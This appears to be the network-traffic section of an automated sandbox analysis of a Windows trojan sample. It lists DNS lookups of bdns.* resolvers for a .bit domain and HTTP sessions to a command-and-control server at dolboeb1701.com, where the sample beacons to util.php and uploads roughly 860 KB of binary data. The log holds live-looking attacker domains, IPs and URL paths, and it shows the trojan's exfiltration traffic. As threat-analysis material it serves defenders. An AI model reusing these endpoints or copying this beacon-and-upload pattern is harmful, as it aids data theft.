Feb 23, 2021 17:50:59.484796047 CET	192.168.2.6	8.8.8.8	0xadf8	Standard query (0)	dolboeb1701.com	A (IP address)	IN (0x0001)

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	Address	Type	Class
Feb 23, 2021 17:49:26.489789009 CET	8.8.8.8	192.168.2.6	0x80a0	No error (0)	bdns.by	88.80.20.20	A (IP address)	IN (0x0001)
Feb 23, 2021 17:49:27.320461988 CET	8.8.8.8	192.168.2.6	0x205	No error (0)	bdns.by	88.80.20.20	A (IP address)	IN (0x0001)
Feb 23, 2021 17:49:27.967782974 CET	8.8.8.8	192.168.2.6	0x920a	No error (0)	bdns.by	88.80.20.20	A (IP address)	IN (0x0001)
Feb 23, 2021 17:49:37.215457916 CET	8.8.8.8	192.168.2.6	0xfad	No error (0)	bdns.co	88.80.21.20	A (IP address)	IN (0x0001)
Feb 23, 2021 17:49:37.949068069 CET	8.8.8.8	192.168.2.6	0xba64	No error (0)	bdns.co	88.80.21.20	A (IP address)	IN (0x0001)
Feb 23, 2021 17:49:38.623399973 CET	8.8.8.8	192.168.2.6	0x95df	No error (0)	bdns.co	88.80.21.20	A (IP address)	IN (0x0001)
Feb 23, 2021 17:49:47.920927048 CET	8.8.8.8	192.168.2.6	0xfe24	No error (0)	bdns.im	194.54.82.12	A (IP address)	IN (0x0001)
Feb 23, 2021 17:49:48.829565048 CET	8.8.8.8	192.168.2.6	0xdbd8	No error (0)	bdns.im	194.54.82.12	A (IP address)	IN (0x0001)
Feb 23, 2021 17:49:49.581415892 CET	8.8.8.8	192.168.2.6	0x416d	No error (0)	bdns.im	194.54.82.12	A (IP address)	IN (0x0001)
Feb 23, 2021 17:49:59.021301985 CET	8.8.8.8	192.168.2.6	0xa373	No error (0)	bdns.io	190.115.26.106	A (IP address)	IN (0x0001)
Feb 23, 2021 17:49:59.994502068 CET	8.8.8.8	192.168.2.6	0x995e	No error (0)	bdns.io	190.115.26.106	A (IP address)	IN (0x0001)
Feb 23, 2021 17:50:00.880533934 CET	8.8.8.8	192.168.2.6	0x978	No error (0)	bdns.io	190.115.26.106	A (IP address)	IN (0x0001)
Feb 23, 2021 17:50:10.188890934 CET	8.8.8.8	192.168.2.6	0xcb74	No error (0)	bdns.link	62.75.198.178	A (IP address)	IN (0x0001)
Feb 23, 2021 17:50:10.752154112 CET	8.8.8.8	192.168.2.6	0x8c70	No error (0)	bdns.link	62.75.198.178	A (IP address)	IN (0x0001)
Feb 23, 2021 17:50:11.138019085 CET	8.8.8.8	192.168.2.6	0x83e1	No error (0)	bdns.link	62.75.198.178	A (IP address)	IN (0x0001)
Feb 23, 2021 17:50:11.372246981 CET	8.8.8.8	192.168.2.6	0xc860	No error (0)	bdns.nu	88.80.20.20	A (IP address)	IN (0x0001)
Feb 23, 2021 17:50:11.372246981 CET	8.8.8.8	192.168.2.6	0xc860	No error (0)	bdns.nu	194.54.82.13	A (IP address)	IN (0x0001)
Feb 23, 2021 17:50:34.471158028 CET	8.8.8.8	192.168.2.6	0xaa7d	No error (0)	bdns.nu	88.80.20.20	A (IP address)	IN (0x0001)
Feb 23, 2021 17:50:34.471158028 CET	8.8.8.8	192.168.2.6	0xaa7d	No error (0)	bdns.nu	194.54.82.13	A (IP address)	IN (0x0001)
Feb 23, 2021 17:50:35.001588106 CET	8.8.8.8	192.168.2.6	0x1672	No error (0)	bdns.nu	88.80.20.20	A (IP address)	IN (0x0001)
Feb 23, 2021 17:50:35.001588106 CET	8.8.8.8	192.168.2.6	0x1672	No error (0)	bdns.nu	194.54.82.13	A (IP address)	IN (0x0001)
Feb 23, 2021 17:50:35.324096918 CET	8.8.8.8	192.168.2.6	0x4b04	No error (0)	bdns.pro	194.54.82.12	A (IP address)	IN (0x0001)
Feb 23, 2021 17:50:35.324096918 CET	8.8.8.8	192.168.2.6	0x4b04	No error (0)	bdns.pro	88.80.20.20	A (IP address)	IN (0x0001)
Feb 23, 2021 17:50:35.324096918 CET	8.8.8.8	192.168.2.6	0x4b04	No error (0)	bdns.pro	190.115.26.106	A (IP address)	IN (0x0001)
Feb 23, 2021 17:50:35.496668100 CET	8.8.8.8	192.168.2.6	0xaa7d	No error (0)	bdns.nu	194.54.82.13	A (IP address)	IN (0x0001)
Feb 23, 2021 17:50:35.496668100 CET	8.8.8.8	192.168.2.6	0xaa7d	No error (0)	bdns.nu	88.80.20.20	A (IP address)	IN (0x0001)
Feb 23, 2021 17:50:57.035257101 CET	8.8.8.8	192.168.2.6	0xc378	No error (0)	bdns.pro	194.54.82.12	A (IP address)	IN (0x0001)
Feb 23, 2021 17:50:57.035257101 CET	8.8.8.8	192.168.2.6	0xc378	No error (0)	bdns.pro	88.80.20.20	A (IP address)	IN (0x0001)
Feb 23, 2021 17:50:57.035257101 CET	8.8.8.8	192.168.2.6	0xc378	No error (0)	bdns.pro	190.115.26.106	A (IP address)	IN (0x0001)
Feb 23, 2021 17:50:57.782000065 CET	8.8.8.8	192.168.2.6	0x84bb	No error (0)	bdns.pro	194.54.82.12	A (IP address)	IN (0x0001)
Feb 23, 2021 17:50:57.782000065 CET	8.8.8.8	192.168.2.6	0x84bb	No error (0)	bdns.pro	88.80.20.20	A (IP address)	IN (0x0001)
Feb 23, 2021 17:50:57.782000065 CET	8.8.8.8	192.168.2.6	0x84bb	No error (0)	bdns.pro	190.115.26.106	A (IP address)	IN (0x0001)
Feb 23, 2021 17:50:58.060647964 CET	8.8.8.8	192.168.2.6	0x691d	No error (0)	dotbit.me	144.76.12.6	A (IP address)	IN (0x0001)
Feb 23, 2021 17:50:59.041929007 CET	8.8.8.8	192.168.2.6	0xd1a9	No error (0)	dolboeb1701.com	47.91.94.99	A (IP address)	IN (0x0001)
Feb 23, 2021 17:50:59.544714928 CET	8.8.8.8	192.168.2.6	0xadf8	No error (0)	dolboeb1701.com	47.91.94.99	A (IP address)	IN (0x0001)

HTTP Request Dependency Graph

bdns.by

bdns.co

bdns.im

bdns.io

bdns.link

bdns.nu

bdns.pro

47.91.94.99

dolboeb1701.com

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
0	192.168.2.6	49723	88.80.20.20	443	C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.36362611.3113.exe

Timestamp	kBytes transferred	Direction	Data
Feb 23, 2021 17:49:37.032202959 CET	1205	OUT	GET /r/kpotuvorot10.bit HTTP/1.1 Host: bdns.by Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
1	192.168.2.6	49733	88.80.21.20	443	C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.36362611.3113.exe

Timestamp	kBytes transferred	Direction	Data
Feb 23, 2021 17:49:47.703583956 CET	1218	OUT	GET /r/kpotuvorot10.bit HTTP/1.1 Host: bdns.co Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
10	192.168.2.6	49785	47.91.94.99	80	C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.36362611.3113.exe

Timestamp	kBytes transferred	Direction	Data
Feb 23, 2021 17:50:59.591033936 CET	6485	OUT	GET /bgczXibj92HSlSCK/util.php?id=53E61D202B0F807656615 HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: dolboeb1701.com Connection: Keep-Alive Cache-Control: no-cache
Feb 23, 2021 17:50:59.902120113 CET	6486	IN	HTTP/1.1 200 OK Server: nginx Date: Tue, 23 Feb 2021 16:50:59 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 992 Connection: keep-alive Vary: Accept-Encoding Vary: Accept-Encoding Vary: Accept-Encoding Data Raw: 32 50 39 36 75 66 5a 67 70 75 6e 49 72 45 78 39 53 79 44 63 63 56 68 37 2b 39 44 49 37 74 72 77 6e 33 50 77 69 76 46 47 35 38 59 7a 5a 36 69 6a 51 36 6f 55 49 38 34 76 56 61 68 67 31 69 44 64 42 34 6d 59 76 34 30 68 68 55 65 6a 58 34 61 50 48 77 78 45 4b 75 78 35 35 59 6e 36 41 6c 6d 78 54 46 44 4c 36 68 69 53 58 63 47 6a 7a 74 2b 6e 75 2f 4d 4a 36 41 66 51 36 67 38 63 77 37 66 52 30 36 57 76 4e 45 71 4f 67 48 6a 38 62 38 4b 62 47 63 6b 46 52 64 4b 55 46 59 30 57 59 35 50 2b 4c 76 4c 62 41 69 4e 51 6f 4c 6e 73 65 65 57 4a 2b 67 4a 5a 73 64 43 75 35 72 72 4c 77 42 79 78 33 2b 56 68 49 45 4f 51 75 41 71 50 42 39 71 66 74 66 75 4f 4a 2b 78 35 35 59 6e 36 41 6c 6d 78 6a 78 36 74 4d 71 32 63 6f 45 54 79 70 68 47 4c 4c 4b 50 65 6e 75 78 35 35 59 6e 36 41 6c 6d 78 68 73 6d 73 42 31 66 47 6a 56 33 73 65 65 57 4a 2b 67 4a 5a 73 64 76 63 74 47 72 61 6a 35 49 53 2b 2f 65 6b 75 31 38 66 5a 66 36 55 2b 6c 66 6f 45 49 69 6e 2f 62 41 49 71 32 67 71 6b 32 47 58 4e 42 46 79 66 6e 32 4d 4b 74 30 79 58 53 51 55 53 49 7a 48 54 37 58 2f 73 72 30 7a 33 6e 64 76 6c 39 51 66 33 35 70 61 79 49 4b 59 37 67 43 69 4c 41 4f 33 4d 41 47 70 44 6f 63 7a 4e 32 74 37 54 71 4e 33 72 6c 78 69 79 7a 2b 77 43 4b 74 6f 4b 70 4e 68 6c 2f 55 6a 71 52 6e 64 41 62 4d 44 61 57 32 45 49 66 41 55 56 61 33 44 39 57 5a 6d 44 71 73 5a 56 44 6a 7a 46 76 62 61 4d 43 64 42 33 42 38 33 56 57 66 66 54 30 57 4a 36 30 53 55 4f 73 4e 56 73 2f 4e 70 79 6c 52 45 75 4e 78 67 55 33 6f 36 32 59 4f 56 74 59 72 7a 61 63 70 55 52 4c 6a 63 59 46 6d 69 75 4d 73 55 53 33 68 77 67 77 63 76 4c 61 52 61 2b 4a 4a 69 59 66 58 58 38 57 54 54 75 4f 78 35 35 59 6e 36 41 6c 6d 78 54 46 44 4c 36 68 69 53 58 63 47 6a 7a 74 2b 6e 75 2f 4d 4a 36 41 66 51 36 67 38 63 77 37 66 52 30 36 57 76 4e 45 71 4f 67 48 6a 38 62 38 4b 62 47 63 6b 46 52 64 4b 55 46 59 30 57 59 35 50 2b 4c 76 4c 62 41 69 4e 51 6f 4c 6e 73 65 65 57 4a 2b 67 4a 5a 73 64 43 75 35 72 72 4c 77 42 79 78 33 2b 56 68 49 45 4f 51 75 41 70 44 36 66 41 4b 31 58 77 55 44 71 34 6f 6c 4c 77 79 6e 77 4b 43 44 62 76 41 67 55 44 4d 42 6d 32 38 7a 66 4f 37 71 48 5a 50 4f 68 31 76 37 49 33 79 2b 30 39 76 70 36 51 47 57 63 39 63 76 2b 64 6b 75 71 57 76 73 4c 45 56 66 36 48 45 49 68 4a 30 79 52 39 6f 67 59 63 44 33 46 2b 6d 4f 4c 71 69 53 42 2f 7a 61 70 42 38 6b 37 7a 4e 38 37 75 6f 64 6b 38 36 63 53 76 7a 37 34 70 35 79 73 70 34 5a 57 55 39 45 54 6d 58 4d 30 38 55 4d 69 33 6e 45 37 39 4b 4b 77 63 67 72 51 67 42 75 67 4b 6a 65 37 2f 75 74 4f 36 2b 63 45 54 65 45 42 4c 61 55 43 54 38 32 4a 71 67 37 37 4c 63 50 48 2b 38 7a 66 4f 37 71 48 5a 50 4f 6a 6f 49 69 66 79 33 4f 6f 37 71 63 4c 53 4c 47 4f 4b 43 71 57 6b 36 31 76 54 65 39 74 30 65 76 6f 6e 72 52 4a 51 36 77 31 57 7a 37 35 74 6c 73 7a 79 4a 30 65 66 43 76 6b 46 35 72 58 66 78 48 59 6e 72 52 4a 51 36 77 31 57 7a 55 73 59 6c 37 38 61 59 58 52 57 4a 36 30 53 55 4f 73 4e 56 73 2f 53 6a 6c 32 6a 72 58 4d 6b 51 78 78 67 76 37 38 6b 2b 55 45 65 6a 77 34 38 71 75 2b 70 47 53 4e 6c 66 30 61 6c 47 75 2f 6a 66 Data Ascii: 2P96ufZgpunIrEx9SyDccVh7+9DI7trwn3PwivFG58YzZ6ijQ6oUI84vVahg1iDdB4mYv40hhUejX4aPHwxEKux55Yn6AlmxTFDL6hiSXcGjzt+nu/MJ6AfQ6g8cw7fR06WvNEqOgHj8b8KbGckFRdKUFY0WY5P+LvLbAiNQoLnseeWJ+gJZsdCu5rrLwByx3+VhIEOQuAqPB9qftfuOJ+x55Yn6Almxjx6tMq2coETyphGLLKPenux55Yn6AlmxhsmsB1fGjV3seeWJ+gJZsdvctGraj5IS+/eku18fZf6U+lfoEIin/bAIq2gqk2GXNBFyfn2MKt0yXSQUSIzHT7X/sr0z3ndvl9Qf35payIKY7gCiLAO3MAGpDoczN2t7TqN3rlxiyz+wCKtoKpNhl/UjqRndAbMDaW2EIfAUVa3D9WZmDqsZVDjzFvbaMCdB3B83VWffT0WJ60SUOsNVs/NpylREuNxgU3o62YOVtYrzacpURLjcYFmiuMsUS3hwgwcvLaRa+JJiYfXX8WTTuOx55Yn6AlmxTFDL6hiSXcGjzt+nu/MJ6AfQ6g8cw7fR06WvNEqOgHj8b8KbGckFRdKUFY0WY5P+LvLbAiNQoLnseeWJ+gJZsdCu5rrLwByx3+VhIEOQuApD6fAK1XwUDq4olLwynwKCDbvAgUDMBm28zfO7qHZPOh1v7I3y+09vp6QGWc9cv+dkuqWvsLEVf6HEIhJ0yR9ogYcD3F+mOLqiSB/zapB8k7zN87uodk86cSvz74p5ysp4ZWU9ETmXM08UMi3nE79KKwcgrQgBugKje7/utO6+cETeEBLaUCT82Jqg77LcPH+8zfO7qHZPOjoIify3Oo7qcLSLGOKCqWk61vTe9t0evonrRJQ6w1Wz75tlszyJ0efCvkF5rXfxHYnrRJQ6w1WzUsYl78aYXRWJ60SUOsNVs/Sjl2jrXMkQxxgv78k+UEejw48qu+pGSNlf0alGu/jf
Feb 23, 2021 17:51:25.673471928 CET	6499	OUT	POST /bgczXibj92HSlSCK/util.php HTTP/1.1 Content-Type: application/octet-stream Content-Encoding: binary Host: dolboeb1701.com Content-Length: 860177 Connection: Keep-Alive Cache-Control: no-cache
Feb 23, 2021 17:51:25.673909903 CET	6511	OUT	Data Raw: 14 da 11 5d 21 e1 03 2d 80 07 48 94 99 a8 eb 32 bb 30 40 32 d2 58 c6 b5 52 42 fb 65 f4 b9 04 a7 52 37 95 2b e8 b0 eb 7b 62 68 1b 76 20 c5 60 54 7e cd 79 f1 2d cc 68 15 b4 a6 be 1f 46 39 fa 85 2c 75 08 f2 44 57 af 49 a3 4b f0 0b 68 4f 62 63 08 a6 Data Ascii: ]!-H20@2XRBeR7+{bhv `T~y-hF9,uDWIKhObcK?)G\Kw9M}xVv9"SvH;jk6)]:j*wP,7^{x-&Q\|{b1__agG\m`%w/@
Feb 23, 2021 17:51:25.717488050 CET	6513	OUT	Data Raw: f3 fe 94 a1 ed 49 a4 40 19 50 4a 7f 92 c0 45 0f c8 0d 69 da e0 7f 08 50 85 aa 11 a8 c0 1d c8 bf be 3d a9 eb 55 86 a6 80 86 f9 cd c7 da 69 ad 4b 28 bd cd 75 95 36 3f d2 5b fd e0 64 24 48 f0 ff 79 4d cb 24 31 ac f4 70 48 72 9a d9 27 a0 5f 8f 73 34 Data Ascii: I@PJEiP=UiK(u6?[d$HyM$1pHr'_s4O`qUokCY,OpNG8XLu7je+6t>9'`uPaH$v(ov1+GD3vV\|a{k)$e4^C>]10FX
Feb 23, 2021 17:51:25.718025923 CET	6529	OUT	Data Raw: dd 6b 09 d6 64 52 3a 71 b3 b5 23 af 3e 08 ee 89 58 94 18 27 07 71 3b 08 e8 d6 0e 34 09 ec 9c b8 b4 3a e6 7b 69 7b 71 1a b7 78 f7 8a 60 50 fb f7 dc c2 48 b5 d7 9c 1b a3 b4 a5 9b 2b b4 15 09 c3 f4 e6 22 55 49 ec f7 9a aa 33 e0 78 dd 3f 9a 5d 5a 51 Data Ascii: kdR:q#>X'q;4:{i{qx`PH+"UI3x?]ZQaG!5%#76qnK_v,.M<K5B.#RQ>mf-uhA~qb$!=\|\|b[Q\1c9UXh?Xa\#9~5:
Feb 23, 2021 17:51:25.718089104 CET	6537	OUT	Data Raw: 29 6e 41 90 2f fe c0 32 be d0 6c 91 c5 4b 6f be a1 46 19 5f 20 f7 d0 41 88 47 09 54 a1 04 e0 5e 2f af d3 93 b1 f3 0b 2e ff 42 df ef 38 47 7a d0 47 df 0b bc 25 f4 4f e0 b4 f4 c4 fd 82 53 5e e0 0c af 9a 62 7b 74 71 0d cf dd fa d3 0a 5a 27 ec ce dd Data Ascii: )nA/2lKoF_ AGT^/.B8GzG%OS^b{tqZ'GK.FGFx+]jQK=kUHS6i"h5r{xsHPrV2?8x:!~e9wc,(Z"x,Bn&HW"`Zz7u,L
Feb 23, 2021 17:51:25.761437893 CET	6539	OUT	Data Raw: 97 c2 9d de 9d 07 e0 a8 83 5c 1d 3e e2 67 a9 3c 83 6e 81 4f 51 b7 90 57 10 fe 30 c0 2f dc 0a 9b 49 ea 68 f3 c2 ff 84 d4 05 66 a2 30 72 8b 0d 2b cb da 62 1a ba 5d 45 1d 27 71 55 17 41 e4 b4 a1 46 6d 45 ff d2 e0 a2 09 3a 23 7d ba 8f e0 ac 29 5f c6 Data Ascii: \>g<nOQW0/Ihf0r+b]E'qUAFmE:#})__B#DHBX;C,'m;\|;kM\|!O]'}[P58>* V+FAtF+iBk3ptJMo+dHFRqvcH`#\|V
Feb 23, 2021 17:51:25.761806965 CET	6542	OUT	Data Raw: 2a ea 39 bb 48 97 02 32 5d 5f f8 3d 67 d0 91 a1 e7 b8 bd 64 75 2f e6 68 cf a3 02 1f 76 55 a4 c8 f4 63 ee 91 88 63 e6 a6 d2 28 dc f3 2a af be 5d 3c 7f e4 69 ea c7 69 0b 26 f0 f5 48 06 0d 00 b6 6d fa d1 22 5b 5b 37 ed a9 80 88 e6 cc d9 04 23 bb 43 Data Ascii: 9H2]_=gdu/hvUcc(]<ii&Hm"[[7#CKEc,$~~2uP%<.="}J8(xFm9U"]!:,^iku}Y}1 ZSYO-(rk}T 4=ms6LMPpSn nE;70GNP_n
Feb 23, 2021 17:51:25.761828899 CET	6547	OUT	Data Raw: 5c f1 a4 63 f6 e6 df 72 33 21 4c 62 0d 65 62 e2 9b bb 0c f4 c7 95 e0 b0 4e 84 7b 83 1b 41 b9 66 5f 96 df e7 fa c9 44 f8 51 52 73 a2 c4 16 0e a6 bc 55 99 d6 d6 07 44 8b 12 21 b0 e8 df ec ba 90 9e cc fb e4 2c d4 f4 82 96 6c 8c d2 4e 2c 30 5c 48 89 Data Ascii: \cr3!LbebN{Af_DQRsUD!,lN,0\HcX=P/[+yns$YLqbU/l,Fat+:[c OPei?bLLl9XAFF@.vL*\j`NR{lf
Feb 23, 2021 17:51:25.761867046 CET	6555	OUT	Data Raw: 48 ce 8d a3 1a 42 78 0a 97 62 6e d9 7d 07 be c5 da 60 4b f8 90 00 57 64 96 4b 09 99 50 e7 29 39 be 3c dd 54 23 de 0e 69 97 d3 0f c4 4e d8 c9 a2 40 77 30 e1 3f 1a ae d3 06 48 f1 c7 7b c9 a9 c7 17 71 6a d9 02 13 f9 4c 21 e2 50 e2 89 33 81 61 1e 83 Data Ascii: HBxbn}`KWdKP)9<T#iN@w0?H{qjL!P3aX^ab*EE\W'I^~5[nK(iw$J,7.6nV(.(3(J-N#[<:^/^vou\o(v5Zq6H4y.?dBL/\|XBRFPG
Feb 23, 2021 17:51:25.762140036 CET	6561	OUT	Data Raw: 29 11 16 a7 b0 37 1e 8e c3 6f 1f 1b d2 78 c3 48 9c 88 96 1a 6b 05 23 e7 4a 88 1c 72 76 5d ba ca 94 e0 77 96 1b 0c 9d 76 77 50 5a 68 44 08 79 e0 4d 38 f3 79 b0 e2 3d 5d 9e 28 24 3b b8 96 7f 53 d7 e4 26 de db 1b 3d a2 63 db cb 50 de d1 fc c1 06 99 Data Ascii: )7oxHk#Jrv]wvwPZhDyM8y=]($;S&=cPXr50R+3q8&"N(WpLL_wJ]jCX'vC6yh@G 0&9Y-VP/[gGeKJ7s<gFS\|;1QIza2<c
Feb 23, 2021 17:51:25.762187004 CET	6572	OUT	Data Raw: 19 bc f7 83 bb 09 48 ae 4d b8 01 9d 87 5a 9e 17 39 b7 3f 5a 84 50 c4 3b 00 59 82 b0 08 14 c7 90 4e fe d2 70 ff e4 29 d3 f0 d7 bd 3d cd 68 9e 38 b9 82 c8 05 d3 f7 01 09 bb 85 88 03 c8 f9 8d f2 76 6e 02 30 d4 b5 43 dd f2 89 85 8a 3d e7 78 6e e1 2c Data Ascii: HMZ9?ZP;YNp)=h8vn0C=xn,f~r[,TFraJw^Q!sOHF=Jnqw~@QC6*0S'Z\z12<j2\|a,@sY\e}BfdO.cFR@
Feb 23, 2021 17:51:28.301080942 CET	7478	IN	HTTP/1.1 200 OK Server: nginx Date: Tue, 23 Feb 2021 16:51:28 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 2 Connection: keep-alive Data Raw: 4f 4b Data Ascii: OK

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
2	192.168.2.6	49737	194.54.82.12	443	C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.36362611.3113.exe

Timestamp	kBytes transferred	Direction	Data
Feb 23, 2021 17:49:58.712088108 CET	1286	OUT	GET /r/kpotuvorot10.bit HTTP/1.1 Host: bdns.im Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
3	192.168.2.6	49743	190.115.26.106	443	C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.36362611.3113.exe

Timestamp	kBytes transferred	Direction	Data
Feb 23, 2021 17:50:09.976687908 CET	1367	OUT	GET /r/kpotuvorot10.bit HTTP/1.1 Host: bdns.io Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
4	192.168.2.6	49752	62.75.198.178	443	C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.36362611.3113.exe

Timestamp	kBytes transferred	Direction	Data
Feb 23, 2021 17:50:11.187283039 CET	1548	OUT	GET /r/kpotuvorot10.bit HTTP/1.1 Host: bdns.link Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
5	192.168.2.6	49770	88.80.20.20	443	C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.36362611.3113.exe

Timestamp	kBytes transferred	Direction	Data
Feb 23, 2021 17:50:35.064672947 CET	6433	OUT	GET /r/kpotuvorot10.bit HTTP/1.1 Host: bdns.nu Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
6	192.168.2.6	49780	194.54.82.12	443	C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.36362611.3113.exe

Timestamp	kBytes transferred	Direction	Data
Feb 23, 2021 17:50:57.872148037 CET	6472	OUT	GET /r/kpotuvorot10.bit HTTP/1.1 Host: bdns.pro Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
7	192.168.2.6	49782	47.91.94.99	80	C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.36362611.3113.exe

Timestamp	kBytes transferred	Direction	Data
Feb 23, 2021 17:50:58.560293913 CET	6479	OUT	GET /bgczXibj92HSlSCK HTTP/1.1 Connection: Keep-Alive Host: 47.91.94.99
Feb 23, 2021 17:50:58.604058981 CET	6479	IN	HTTP/1.1 403 Forbidden Server: nginx Date: Tue, 23 Feb 2021 16:50:58 GMT Content-Type: text/html Content-Length: 162 Connection: keep-alive Vary: Accept-Encoding Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body bgcolor="white"><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>
Feb 23, 2021 17:50:58.605179071 CET	6480	OUT	GET /bgczXibj92HSlSCK HTTP/1.1 Connection: Keep-Alive Host: 47.91.94.99
Feb 23, 2021 17:50:58.649339914 CET	6480	IN	HTTP/1.1 403 Forbidden Server: nginx Date: Tue, 23 Feb 2021 16:50:58 GMT Content-Type: text/html Content-Length: 162 Connection: keep-alive Vary: Accept-Encoding Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body bgcolor="white"><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
8	192.168.2.6	49783	47.91.94.99	80	C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.36362611.3113.exe

Timestamp	kBytes transferred	Direction	Data
Feb 23, 2021 17:50:58.703516006 CET	6480	OUT	GET /bgczXibj92HSlSCK HTTP/1.1 Host: 47.91.94.99 Connection: Keep-Alive Cache-Control: no-cache
Feb 23, 2021 17:50:58.747348070 CET	6481	IN	HTTP/1.1 403 Forbidden Server: nginx Date: Tue, 23 Feb 2021 16:50:58 GMT Content-Type: text/html Content-Length: 162 Connection: keep-alive Vary: Accept-Encoding Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body bgcolor="white"><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>
Feb 23, 2021 17:50:58.749028921 CET	6481	OUT	GET /bgczXibj92HSlSCK HTTP/1.1 Host: 47.91.94.99 Connection: Keep-Alive Cache-Control: no-cache
Feb 23, 2021 17:50:58.792897940 CET	6481	IN	HTTP/1.1 403 Forbidden Server: nginx Date: Tue, 23 Feb 2021 16:50:58 GMT Content-Type: text/html Content-Length: 162 Connection: keep-alive Vary: Accept-Encoding Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body bgcolor="white"><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
9	192.168.2.6	49784	47.91.94.99	80	C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.36362611.3113.exe

Timestamp	kBytes transferred	Direction	Data
Feb 23, 2021 17:50:59.089148998 CET	6482	OUT	GET /bgczXibj92HSlSCK HTTP/1.1 Connection: Keep-Alive Host: dolboeb1701.com
